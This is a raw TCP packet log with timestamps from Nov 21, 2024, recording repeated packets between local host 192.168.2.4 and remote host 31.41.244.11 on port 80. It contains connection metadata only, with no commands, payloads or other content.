                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.587994099 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.588021040 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.588953972 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.589013100 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.589071989 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.589123011 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.590069056 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.590122938 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.590266943 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.590316057 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.591140032 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.591192961 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.591253996 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.591305971 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.592214108 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.592267990 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.592331886 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.592381954 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.593307972 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.593362093 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.593409061 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.593460083 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.594468117 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.594526052 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.594599962 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.594656944 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.595530987 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.595596075 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.595598936 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.595681906 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.596596956 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.596657991 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.596714973 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.596766949 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.597691059 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.597750902 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.597789049 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.597842932 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.598768950 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.598826885 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.598897934 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.598953009 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.599838018 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.599893093 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.599961996 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.600014925 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.600913048 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.600970984 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.601018906 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.601069927 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.602044106 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.602102041 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.602129936 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.602197886 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.603106976 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.603162050 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.603215933 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.603272915 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.604208946 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.604264975 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.604335070 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.604387999 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.605261087 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.605320930 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.605374098 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.605428934 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.606385946 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.606472969 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.606487989 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.606539965 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.607465982 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.607518911 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.607595921 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.607649088 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.608551979 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.608609915 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.608655930 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.608709097 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.609646082 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.609699011 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.609750032 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.609802961 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.610711098 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.610769987 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.610831022 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.610887051 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.611812115 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.611865044 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.611923933 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.611975908 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.612945080 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.612997055 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.613060951 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.613115072 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.614089012 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.614146948 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.614202023 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.614264965 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.615078926 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.615130901 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.615169048 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.615216970 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.616187096 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.616269112 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.616286993 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.616345882 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.617274046 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.617327929 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.617403984 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.617465973 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.618366957 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.618426085 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.618480921 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.618536949 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.619467974 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.619527102 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.619596958 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.619649887 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.620578051 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.620632887 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.620718956 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.620770931 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.621658087 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.621715069 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.621762991 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.621822119 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.622733116 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.622797012 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.622853041 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.622905970 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.623809099 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.623872042 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.623919964 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.623970985 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.624917984 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.624970913 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.625004053 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.625060081 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.626007080 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.626061916 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.626108885 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.626161098 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.627131939 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.627187967 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.627268076 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.627322912 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.628163099 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.628222942 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.628278971 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.628329992 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.629192114 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.629255056 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.782680988 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.782761097 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.782985926 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.783090115 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.783137083 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.783158064 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.783196926 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.784187078 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.784291029 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.784318924 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.784369946 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.785271883 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.785331011 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.785384893 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.785434008 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.786355019 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.786412001 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.786456108 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.786504984 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.787482977 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.787543058 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.787575960 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.787630081 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.788527966 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.788616896 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.788665056 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.788724899 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.789647102 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.789714098 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.789761066 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.789814949 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.790724993 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.790851116 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.790879965 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.790949106 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.791811943 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.791887999 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.792018890 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.792073965 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.792956114 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.793010950 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.793013096 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.793060064 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.794008970 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.794065952 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.794105053 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.794158936 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.795073032 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.795126915 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.795178890 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.795229912 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.796222925 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.796276093 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.796315908 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.796370029 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.797300100 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.797367096 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.797368050 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.797416925 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.798439980 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.798495054 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.798543930 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.798597097 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.799431086 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.799487114 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.799521923 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.799573898 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.800555944 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.800610065 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.800662041 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.800714016 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.801608086 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.801678896 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.801723957 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.801865101 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.802705050 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.802787066 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.802836895 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.802962065 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.803802013 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.803867102 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.803898096 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.803975105 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.804881096 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.804984093 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.805129051 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.805975914 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.806075096 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.806135893 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.807065964 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.807180882 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.807259083 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.808151007 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.808211088 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.808255911 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.808310032 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.809237957 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.809300900 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.809350014 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.809406996 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.810331106 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.810406923 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.810463905 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.811397076 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.811531067 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:14.811583042 CET4977080192.168.2.431.41.244.11
